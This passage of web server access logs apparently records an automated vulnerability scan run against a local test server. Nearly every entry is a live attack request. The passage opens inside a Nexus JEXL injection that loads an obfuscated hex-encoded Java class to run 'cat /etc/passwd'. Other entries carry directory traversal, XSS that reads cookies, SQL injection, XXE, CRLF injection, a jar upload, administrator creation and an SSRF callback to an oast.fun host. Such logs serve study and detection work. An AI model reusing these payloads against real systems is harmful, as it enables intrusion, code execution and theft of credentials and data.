7003d00de003e00f4003f00fb004001110041011800420131004401380045013d0049002b000000de001600a5002c00300031000f0092004500320033000e0000013e003400350000000801360036003700010012012c00380039000200190125003a003b0003002e0110003c003500040033010b003d003e0005004200fc003f00400006005100ed004100310007005b00e3004200430008006400da004400400009007300cb00450031000a007d00c100460043000b008600b800470040000c008f00af00480031000d00de006000490043000e00f4004a004a0031000f00fb0043004b004300100111002d004c0031001101180026004d004300120131000d004e004f00130050000000340005005b00e3004200510008007d00c100460051000b00de006000490051000e00fb0043004b0051001001180026004d005100120052000000040001005300010054000000020055'; y=0; z=''; while (y lt x.length()){ z += c.toChars(integer.parseInt(x.substring(y, y+2), 16))[0]; y += 2; };defineClass=2.class.forName('java.lang.Thread');x=defineClass.getDeclaredMethod('currentThread').invoke(null);y=defineClass.getDeclaredMethod('getContextClassLoader').invoke(x);defineClass=2.class.forName('java.lang.ClassLoader').getDeclaredMethod('defineClass','1'.class,1.class.forName('[B'),1.class.forName('[I').getComponentType(),1.class.forName('[I').getComponentType()); \x5CndefineClass.setAccessible(true);\x5Cnx=defineClass.invoke(\x5Cn y,\x5Cn 'Exploit.Test234',\x5Cn z.getBytes('latin1'), 0,\x5Cn 3054\x5Cn);x.getMethod('test', ''.class).invoke(null, 'cat /etc/passwd');'done!'}\x5Cn\x22}, {\x22property\x22: \x22type\x22, \x22value\x22: \x22jexl\x22}], \x22limit\x22: 50, \x22page\x22: 1}], \x22method\x22: \x22previewAssets\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /service/extdirect HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /iPages/i_login.asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.062","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /....4.2.1....json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.062","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nbproject/project.properties HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.063","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /env.prod.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E& HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7422)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xmlpserver/convert?xml=<%3fxml+version%3d\x221.0\x22+%3f>%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /man.cgi?redirect=setting.htm%0d%0a%0d%0a&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=&TF_port=&B_mac_apply=APPLY HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://example.com/https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json?FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /compliancepolicyelements.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL+--+&searchColumn=elementName&searchOption=contains HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"ip=c9v8h88smpv8c1ig07h0t75ooifooyoz1.oast.fun:80&argu=/","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /php/query.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/parsi-font/css.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ== HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"--8ce4b16b22b58894aa86c421e8759df3\x0D\x0AContent-Disposition: form-data; name=\x22jarfile\x22;filename=\x22poc.jar\x22\x0D\x0AContent-Type:application/octet-stream\x0D\x0A\x0D\x0A 297MTr9ISGPwDN6XXPbznyiIaF3\x0D\x0A--8ce4b16b22b58894aa86c421e8759df3--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /jars/upload HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.046","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /runningpods/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.179","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://www.%5C.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/home HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.168","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jstore&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CgiStart?page=Single HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json?FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.174","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:/%5C/%5Cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /~user/%0D%0ASet-Cookie:crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=../../../../../index.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3C%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername=QfVhbU&adminpassword=g2YL9I&adminemail=test@test.com&adminname=test HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json?FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.179","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:/%5Cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/tenants HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?piereg_logout_url=true&redirect_to=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"yuzo_related_post_css_and_style=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/options-general.php?page=yuzo-related-post HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json/FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json/FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.164","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json/FNZ.png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.162","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.168","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /redoc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json/FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.168","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"http:","request":"GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=qqq%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpmyadmin/scripts/setup.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/86 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.167","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openapi.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.1.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"http:","request":"GET /cs/Satellite?destpage=\x22&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", 